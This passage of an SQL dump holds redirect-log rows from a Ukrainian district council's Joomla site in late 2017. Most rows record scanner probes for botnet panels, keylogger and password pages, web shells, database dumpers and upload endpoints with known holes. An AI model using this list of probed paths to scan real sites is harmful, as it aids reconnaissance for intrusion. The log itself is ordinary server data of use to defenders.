00:00:00',301),(31254,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/activecmd.php',NULL,'','',1,0,'2017-09-29 05:33:20','0000-00-00 00:00:00',301),(31255,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/function.php',NULL,'','',1,0,'2017-09-29 05:33:26','0000-00-00 00:00:00',301),(31256,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/main.css',NULL,'','',1,0,'2017-09-29 05:33:33','0000-00-00 00:00:00',301),(31257,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/bar.png',NULL,'','',1,0,'2017-09-29 05:33:41','0000-00-00 00:00:00',301),(31258,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/cp.php',NULL,'','',2,0,'2017-09-29 05:33:52','0000-00-00 00:00:00',301),(31259,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/theme/images/back-all.jpg',NULL,'','',1,0,'2017-09-29 05:33:59','0000-00-00 00:00:00',301),(31260,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/theme/header.html',NULL,'','',2,0,'2017-09-29 05:34:09','0000-00-00 00:00:00',301),(31261,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/asdfdsafdsfsadf.php',NULL,'','',1,0,'2017-09-29 05:34:38','0000-00-00 00:00:00',301),(31262,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/security_number.php',NULL,'','',2,0,'2017-09-29 05:34:41','0000-00-00 00:00:00',301),(31263,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/connect.php',NULL,'','',2,0,'2017-09-29 05:35:01','0000-00-00 00:00:00',301),(31264,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/inc/',NULL,'','',2,0,'2017-09-29 05:35:58','0000-00-00 00:00:00',301),(31265,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/ico/',NULL,'','',2,0,'2017-09-29 05:36:33','0000-00-00 00:00:00',301),(31266,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/png/',NULL,'','',2,0,'2017-09-29 05:36:47','0000-00-00 00:00:00',301),(31267,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/preloaders/',NULL,'','',2,0,'2017-09-29 05:37:00','0000-00-00 00:00:00',301),(31268,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/back.css',NULL,'','',1,0,'2017-09-29 05:37:32','0000-00-00 00:00:00',301),(31269,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img/favicon.png',NULL,'','',1,0,'2017-09-29 05:38:31','0000-00-00 00:00:00',301),(31270,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img/logo.png',NULL,'','',5,0,'2017-09-29 05:38:39','0000-00-00 00:00:00',301),(31271,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/management.php',NULL,'','',2,0,'2017-09-29 05:38:51','0000-00-00 00:00:00',301),(31272,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/css/vectormap.css',NULL,'','',2,0,'2017-09-29 05:39:06','0000-00-00 00:00:00',301),(31273,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/js/manag.js',NULL,'','',2,0,'2017-09-29 05:39:24','0000-00-00 00:00:00',301),(31274,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/js/tasks.js',NULL,'','',2,0,'2017-09-29 05:39:43','0000-00-00 00:00:00',301),(31275,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img/',NULL,'','',4,0,'2017-09-29 05:40:29','0000-00-00 00:00:00',301),(31276,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/statistics.php',NULL,'','',3,0,'2017-09-29 05:40:43','0000-00-00 00:00:00',301),(31277,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/icon1.png',NULL,'','',1,0,'2017-09-29 05:41:22','0000-00-00 00:00:00',301),(31278,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/icon3.png',NULL,'','',1,0,'2017-09-29 05:41:25','0000-00-00 00:00:00',301),(31279,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/header.jpg',NULL,'','',1,0,'2017-09-29 05:41:40','0000-00-00 00:00:00',301),(31280,'http://malyn-rayrada.gov.ua/client/accept.php',NULL,'','',1,0,'2017-09-29 05:41:53','0000-00-00 00:00:00',301),(31281,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/main.php',NULL,'','',3,0,'2017-09-29 05:43:02','0000-00-00 00:00:00',301),(31282,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/submit.php',NULL,'','',1,0,'2017-09-29 05:43:07','0000-00-00 00:00:00',301),(31283,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/style.css',NULL,'','',1,0,'2017-09-29 05:43:38','0000-00-00 00:00:00',301),(31284,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/design/images/favicon.ico',NULL,'','',1,0,'2017-09-29 05:43:50','0000-00-00 00:00:00',301),(31285,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/assets/img/favicon.ico',NULL,'','',1,0,'2017-09-29 05:44:18','0000-00-00 00:00:00',301),(31286,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/order.php',NULL,'','',1,0,'2017-09-29 05:45:00','0000-00-00 00:00:00',301),(31287,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/captcha.php',NULL,'','',1,0,'2017-09-29 05:45:05','0000-00-00 00:00:00',301),(31288,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/gdx/gdx.php',NULL,'','',1,0,'2017-09-29 05:45:16','0000-00-00 00:00:00',301),(31289,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/gdx/itnernal.php',NULL,'','',1,0,'2017-09-29 05:45:25','0000-00-00 00:00:00',301),(31290,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/flags/ag.png',NULL,'','',1,0,'2017-09-29 05:45:30','0000-00-00 00:00:00',301),(31291,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/bot_info.php',NULL,'','',1,0,'2017-09-29 05:46:23','0000-00-00 00:00:00',301),(31292,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/hexdecode.php',NULL,'','',1,0,'2017-09-29 05:46:26','0000-00-00 00:00:00',301),(31293,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/stats.php',NULL,'','',1,0,'2017-09-29 05:46:36','0000-00-00 00:00:00',301),(31294,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/delete.png',NULL,'','',1,0,'2017-09-29 05:46:42','0000-00-00 00:00:00',301),(31295,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/info.png',NULL,'','',1,0,'2017-09-29 05:46:54','0000-00-00 00:00:00',301),(31296,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/delete_command.php',NULL,'','',1,0,'2017-09-29 05:47:01','0000-00-00 00:00:00',301),(31297,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/send_command.php',NULL,'','',1,0,'2017-09-29 05:47:12','0000-00-00 00:00:00',301),(31298,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/theme/images/back-all.png',NULL,'','',1,0,'2017-09-29 05:47:21','0000-00-00 00:00:00',301),(31299,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/themes/bootstrap.css',NULL,'','',1,0,'2017-09-29 05:48:06','0000-00-00 00:00:00',301),(31300,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/phpinfo.php',NULL,'','',1,0,'2017-09-29 05:48:37','0000-00-00 00:00:00',301),(31301,'http://malyn-rayrada.gov.ua/post/echo',NULL,'','',1,0,'2017-09-29 05:49:45','0000-00-00 00:00:00',301),(31302,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/fre.php',NULL,'','',1,0,'2017-09-29 05:50:07','0000-00-00 00:00:00',301),(31303,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/adsfdsafas.php',NULL,'','',1,0,'2017-09-29 05:50:18','0000-00-00 00:00:00',301),(31304,'http://malyn-rayrada.gov.ua/path/index.php',NULL,'','',1,0,'2017-09-29 05:50:50','0000-00-00 00:00:00',301),(31305,'http://malyn-rayrada.gov.ua/index.php/css',NULL,'','',2,0,'2017-09-29 05:51:06','0000-00-00 00:00:00',301),(31306,'http://malyn-rayrada.gov.ua/index.php/files',NULL,'','',2,0,'2017-09-29 05:51:07','0000-00-00 00:00:00',301),(31307,'http://malyn-rayrada.gov.ua/index.php/img/back',NULL,'','',1,0,'2017-09-29 05:51:29','0000-00-00 00:00:00',301),(31308,'http://malyn-rayrada.gov.ua/index.php/img/flags',NULL,'','',2,0,'2017-09-29 05:51:31','0000-00-00 00:00:00',301),(31309,'http://malyn-rayrada.gov.ua/index.php/img/softs',NULL,'','',2,0,'2017-09-29 05:51:45','0000-00-00 00:00:00',301),(31310,'http://malyn-rayrada.gov.ua/index.php/img/back/hawk-clip-art-hawk03.gif',NULL,'','',2,0,'2017-09-29 05:51:50','0000-00-00 00:00:00',301),(31311,'http://malyn-rayrada.gov.ua/index.php/img/logo.png',NULL,'','',2,0,'2017-09-29 05:51:58','0000-00-00 00:00:00',301),(31312,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/css',NULL,'','',3,0,'2017-09-29 05:52:14','0000-00-00 00:00:00',301),(31313,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/files',NULL,'','',2,0,'2017-09-29 05:52:28','0000-00-00 00:00:00',301),(31314,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img/back',NULL,'','',1,0,'2017-09-29 05:52:36','0000-00-00 00:00:00',301),(31315,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img/flags',NULL,'','',2,0,'2017-09-29 05:52:37','0000-00-00 00:00:00',301),(31316,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img/softs',NULL,'','',2,0,'2017-09-29 05:52:49','0000-00-00 00:00:00',301),(31317,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img/back/hawk-clip-art-hawk03.gif',NULL,'','',2,0,'2017-09-29 05:52:57','0000-00-00 00:00:00',301),(31318,'http://malyn-rayrada.gov.ua/index.php/ img/back',NULL,'','',1,0,'2017-09-29 05:53:36','0000-00-00 00:00:00',301),(31319,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/ img/back',NULL,'','',1,0,'2017-09-29 05:54:42','0000-00-00 00:00:00',301),(31320,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/login/index.php',NULL,'','',2,0,'2017-09-29 05:55:58','0000-00-00 00:00:00',301),(31321,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/',NULL,'','',1,0,'2017-09-29 05:56:13','0000-00-00 00:00:00',301),(31322,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/js/main.js',NULL,'','',1,0,'2017-09-29 05:56:16','0000-00-00 00:00:00',301),(31323,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/asfdasfasdfasdf.php',NULL,'','',1,0,'2017-09-29 05:56:40','0000-00-00 00:00:00',301),(31324,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/configuration.php',NULL,'','',2,0,'2017-09-29 05:56:46','0000-00-00 00:00:00',301),(31325,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/page.php',NULL,'','',1,0,'2017-09-29 05:56:50','0000-00-00 00:00:00',301),(31326,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/inc_botlist.php',NULL,'','',1,0,'2017-09-29 05:57:01','0000-00-00 00:00:00',301),(31327,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/inc_commands.php',NULL,'','',1,0,'2017-09-29 05:57:11','0000-00-00 00:00:00',301),(31328,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/tpl_commands-php',NULL,'','',1,0,'2017-09-29 05:57:18','0000-00-00 00:00:00',301),(31329,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/include/tpl_main.php',NULL,'','',1,0,'2017-09-29 05:57:24','0000-00-00 00:00:00',301),(31330,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/securimage/backgrounds',NULL,'','',1,0,'2017-09-29 05:57:37','0000-00-00 00:00:00',301),(31331,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/styles/main.css',NULL,'','',1,0,'2017-09-29 05:57:53','0000-00-00 00:00:00',301),(31332,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/styles/reset.css',NULL,'','',1,0,'2017-09-29 05:57:55','0000-00-00 00:00:00',301),(31333,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/images/favicon.ico',NULL,'','',1,0,'2017-09-29 05:58:15','0000-00-00 00:00:00',301),(31334,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/gate.php?request=true',NULL,'','',1,0,'2017-09-29 05:58:28','0000-00-00 00:00:00',301),(31335,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/bots.php',NULL,'','',1,0,'2017-09-29 05:58:36','0000-00-00 00:00:00',301),(31336,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/edituser.php',NULL,'','',1,0,'2017-09-29 05:58:46','0000-00-00 00:00:00',301),(31337,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/main.php',NULL,'','',1,0,'2017-09-29 05:58:49','0000-00-00 00:00:00',301),(31338,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/tasks.php',NULL,'','',1,0,'2017-09-29 05:59:00','0000-00-00 00:00:00',301),(31339,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/users.php',NULL,'','',1,0,'2017-09-29 05:59:07','0000-00-00 00:00:00',301),(31340,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/logs.php',NULL,'','',1,0,'2017-09-29 05:59:13','0000-00-00 00:00:00',301),(31341,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/account.php',NULL,'','',1,0,'2017-09-29 05:59:18','0000-00-00 00:00:00',301),(31342,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/settings.php',NULL,'','',1,0,'2017-09-29 05:59:25','0000-00-00 00:00:00',301),(31343,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/details.php',NULL,'','',1,0,'2017-09-29 05:59:34','0000-00-00 00:00:00',301),(31344,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/logout.php',NULL,'','',1,0,'2017-09-29 05:59:42','0000-00-00 00:00:00',301),(31345,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/pages/help.php',NULL,'','',1,0,'2017-09-29 05:59:47','0000-00-00 00:00:00',301),(31346,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/ufr.php',NULL,'','',1,0,'2017-09-29 06:00:13','0000-00-00 00:00:00',301),(31347,'http://malyn-rayrada.gov.ua/panel/login.php',NULL,'','',1,0,'2017-09-29 06:00:43','0000-00-00 00:00:00',301),(31348,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/login.php',NULL,'','',1,0,'2017-09-29 06:00:47','0000-00-00 00:00:00',301),(31349,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/android/admin.php',NULL,'','',1,0,'2017-09-29 06:01:21','0000-00-00 00:00:00',301),(31350,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img',NULL,'','',3,0,'2017-09-29 06:02:10','0000-00-00 00:00:00',301),(31351,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/img/banners',NULL,'','',2,0,'2017-09-29 06:02:14','0000-00-00 00:00:00',301),(31352,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/afdsafsdaf.php',NULL,'','',1,0,'2017-09-29 06:02:43','0000-00-00 00:00:00',301),(31353,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/style_light.css',NULL,'','',1,0,'2017-09-29 06:03:04','0000-00-00 00:00:00',301),(31354,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/gate.php',NULL,'','',2,0,'2017-09-29 06:03:06','0000-00-00 00:00:00',301),(31355,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes',NULL,'','',1,0,'2017-09-29 06:03:25','0000-00-00 00:00:00',301),(31356,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/',NULL,'','',1,0,'2017-09-29 06:03:37','0000-00-00 00:00:00',301),(31357,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/statistics.php/',NULL,'','',1,0,'2017-09-29 06:03:49','0000-00-00 00:00:00',301),(31358,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/database.php',NULL,'','',1,0,'2017-09-29 06:03:57','0000-00-00 00:00:00',301),(31359,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/database.php/',NULL,'','',1,0,'2017-09-29 06:04:00','0000-00-00 00:00:00',301),(31360,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/gate.php/',NULL,'','',1,0,'2017-09-29 06:04:17','0000-00-00 00:00:00',301),(31361,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/commands.php',NULL,'','',1,0,'2017-09-29 06:04:23','0000-00-00 00:00:00',301),(31362,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/includes/commands.php/',NULL,'','',1,0,'2017-09-29 06:04:37','0000-00-00 00:00:00',301),(31363,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/css/table_view.css',NULL,'','',1,0,'2017-09-29 06:04:58','0000-00-00 00:00:00',301),(31364,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/21421asdfdsf.php',NULL,'','',1,0,'2017-09-29 06:05:25','0000-00-00 00:00:00',301),(31365,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/webcams.php',NULL,'','',1,0,'2017-09-29 06:05:32','0000-00-00 00:00:00',301),(31366,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/deleteall.php',NULL,'','',1,0,'2017-09-29 06:05:45','0000-00-00 00:00:00',301),(31367,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/delete.php',NULL,'','',1,0,'2017-09-29 06:05:48','0000-00-00 00:00:00',301),(31368,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/passwords.php',NULL,'','',1,0,'2017-09-29 06:06:02','0000-00-00 00:00:00',301),(31369,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/keystrokes.php',NULL,'','',1,0,'2017-09-29 06:06:11','0000-00-00 00:00:00',301),(31370,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/post.php',NULL,'','',1,0,'2017-09-29 06:06:23','0000-00-00 00:00:00',301),(31371,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/create.php',NULL,'','',1,0,'2017-09-29 06:06:30','0000-00-00 00:00:00',301),(31372,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/language.php',NULL,'','',1,0,'2017-09-29 06:06:34','0000-00-00 00:00:00',301),(31373,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/resources/images/',NULL,'','',2,0,'2017-09-29 06:07:06','0000-00-00 00:00:00',301),(31374,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/resources/css/',NULL,'','',2,0,'2017-09-29 06:07:26','0000-00-00 00:00:00',301),(31375,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/flags/',NULL,'','',2,0,'2017-09-29 06:07:35','0000-00-00 00:00:00',301),(31376,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/images/',NULL,'','',2,0,'2017-09-29 06:07:44','0000-00-00 00:00:00',301),(31377,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/resources/images/black/button/btn-arrow.gif',NULL,'','',1,0,'2017-09-29 06:08:01','0000-00-00 00:00:00',301),(31378,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/resources/images/black/menu/menu.gif',NULL,'','',1,0,'2017-09-29 06:08:03','0000-00-00 00:00:00',301),(31379,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/resources/images/default/button/btn-arrow.gif',NULL,'','',1,0,'2017-09-29 06:08:14','0000-00-00 00:00:00',301),(31380,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/resources/images/default/menu/menu.gif',NULL,'','',1,0,'2017-09-29 06:08:18','0000-00-00 00:00:00',301),(31381,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/images/save.png',NULL,'','',1,0,'2017-09-29 06:08:22','0000-00-00 00:00:00',301),(31382,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/admin/images/add.png',NULL,'','',1,0,'2017-09-29 06:08:31','0000-00-00 00:00:00',301),(31383,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1790-pro-vnesennya-zmin-do-rajonnoji-programi-teritorialna-oborona-na-2017-2020-roki?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2017-09-29 08:03:56','0000-00-00 00:00:00',301),(31384,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1790-pro-vnesennya-zmin-do-rajonnoji-programi-teritorialna-oborona-na-2017-2020-roki?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2017-09-29 12:28:19','0000-00-00 00:00:00',301),(31385,'http://malyn-rayrada.gov.ua/62e862de-a9b2-4674-a3be-a31feed9e913',NULL,'','',1,0,'2017-10-01 23:40:10','0000-00-00 00:00:00',301),(31386,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1789-pro-peredachu-primishchennya-buvshoji-vishivskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-vishivskoji-silskoji-radi?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2017-10-02 19:20:33','0000-00-00 00:00:00',301),(31387,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1790-pro-vnesennya-zmin-do-rajonnoji-programi-teritorialna-oborona-na-2017-2020-roki',NULL,'','',21,0,'2017-10-03 06:45:14','0000-00-00 00:00:00',301),(31388,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1789-pro-peredachu-primishchennya-buvshoji-vishivskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-vishivskoji-silskoji-radi',NULL,'','',27,0,'2017-10-04 12:53:42','0000-00-00 00:00:00',301),(31389,'http://malyn-rayrada.gov.ua/wp-content/uploads/8d50b4e6d397714.php',NULL,'','',1,0,'2017-10-04 15:36:19','0000-00-00 00:00:00',301),(31390,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1790-pro-vnesennya-zmin-do-rajonnoji-programi-teritorialna-oborona-na-2017-2020-roki',NULL,'','',31,0,'2017-10-05 08:42:18','0000-00-00 00:00:00',301),(31391,'http://www.malyn-rayrada.gov.ua/modules/mod_artuploader/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_artuploader/upload.php','',2,0,'2017-10-08 09:19:15','0000-00-00 00:00:00',301),(31392,'http://malyn-rayrada.gov.ua/\'\'',NULL,'','',5,0,'2017-10-09 15:44:27','0000-00-00 00:00:00',301),(31393,'http://malyn-rayrada.gov.ua/e24c27db-7543-4a0e-96de-a32ae722fdda',NULL,'','',1,0,'2017-10-10 17:21:13','0000-00-00 00:00:00',301),(31394,'http://www.malyn-rayrada.gov.ua/modules/filesupload/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/filesupload/upload.php','',1,0,'2017-10-12 17:07:43','0000-00-00 00:00:00',301),(31395,'http://www.malyn-rayrada.gov.ua/libraries/joomla/application/data.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/joomla/application/data.php','',1,0,'2017-10-13 15:57:52','0000-00-00 00:00:00',301),(31396,'http://malyn-rayrada.gov.ua/libraries/lol.php',NULL,'','',1,0,'2017-10-13 16:31:26','0000-00-00 00:00:00',301),(31397,'http://malyn-rayrada.gov.ua/libraries/joomla/css.php',NULL,'','',1,0,'2017-10-13 16:31:26','0000-00-00 00:00:00',301),(31398,'http://malyn-rayrada.gov.ua/libraries/joomla/application/data.php',NULL,'http://malyn-rayrada.gov.ua/libraries/joomla/application/data.php','',1,0,'2017-10-13 21:27:24','0000-00-00 00:00:00',301),(31399,'http://malyn-rayrada.gov.ua/http:/',NULL,'','',1,0,'2017-10-15 00:07:02','0000-00-00 00:00:00',301),(31400,'http://malyn-rayrada.gov.ua/c3qxcfbqqcddbxtk62a',NULL,'','',1,0,'2017-10-18 03:43:21','0000-00-00 00:00:00',301),(31401,'http://www.malyn-rayrada.gov.ua/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.malyn-rayrada.gov.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','',1,0,'2017-10-22 11:32:03','0000-00-00 00:00:00',301),(31402,'http://malyn-rayrada.gov.ua/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://malyn-rayrada.gov.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','',1,0,'2017-10-22 17:06:38','0000-00-00 00:00:00',301),(31403,'http://malyn-rayrada.gov.ua/dumper.php',NULL,'','',2,0,'2017-10-23 04:45:50','0000-00-00 00:00:00',301),(31404,'http://malyn-rayrada.gov.ua/dumper/dumper.php',NULL,'','',2,0,'2017-10-23 04:45:50','0000-00-00 00:00:00',301),(31405,'http://malyn-rayrada.gov.ua/admin/cms_wysiwyg/directive/index/',NULL,'http://malyn-rayrada.gov.ua/admin/Cms_Wysiwyg/directive/index/','',8,0,'2017-10-23 12:15:56','0000-00-00 00:00:00',301),(31406,'http://www.malyn-rayrada.gov.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://www.malyn-rayrada.gov.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',1,0,'2017-10-23 15:43:36','0000-00-00 00:00:00',301),(31407,'http://malyn-rayrada.gov.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://malyn-rayrada.gov.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',1,0,'2017-10-23 21:16:01','0000-00-00 00:00:00',301),(31408,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','',1,0,'2017-10-24 00:33:57','0000-00-00 00:00:00',301),(31409,'http://www.malyn-rayrada.gov.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.malyn-rayrada.gov.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',1,0,'2017-10-25 09:00:22','0000-00-00 00:00:00',301),(31410,'http://malyn-rayrada.gov.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://malyn-rayrada.gov.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',1,0,'2017-10-25 14:45:52','0000-00-00 00:00:00',301),(31411,'http://malyn-rayrada.gov.ua/uwe7dojib6hx25gawrmkvn',NULL,'','',1,0,'2017-10-26 20:53:49','0000-00-00 00:00:00',301),(31412,'http://malyn-rayrada.gov.ua/index.php/1825-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-20-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',38,0,'2017-10-28 11:06:16','0000-00-00 